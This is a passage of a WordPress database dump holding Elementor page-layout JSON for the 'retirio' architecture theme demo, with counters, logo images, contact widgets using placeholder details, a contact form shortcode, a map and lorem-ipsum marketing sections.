0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\"},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1630,4622,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(1631,4623,'_wp_page_template','elementor_header_footer'),(1632,4623,'_elementor_edit_mode','builder'),(1633,4623,'_elementor_template_type','wp-page'),(1634,4623,'_elementor_version','3.6.6'),(1635,4623,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"30 broklyn golden street. New York\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/EzkDhhJPJ1XN4SKh6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"London Eye, London, United Kingdom\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_css_filter\":\"custom\",\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(1636,4623,'_elementor_page_assets','a:0:{}'),(1637,4624,'_wp_page_template','elementor_header_footer'),(1638,4624,'_elementor_edit_mode','builder'),(1639,4624,'_elementor_template_type','wp-page'),(1640,4624,'_elementor_version','3.6.6'),(1641,4624,'_elementor_data','[{\"id\":\"578acfb\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4caa43\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"30744ba\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85c5f4d\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8496340\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8123550\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"87e58d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7ffcc0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"130925d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10ce6ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"78581cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0b3fb8c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"43c3626\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a69021d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a9e6da9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"0249a61\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ae4a63\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f35ad08\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":44,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"c21f4cf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose us?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_description\":\"#D2D2D2\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7913109\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"d2d92ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"70eed1b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\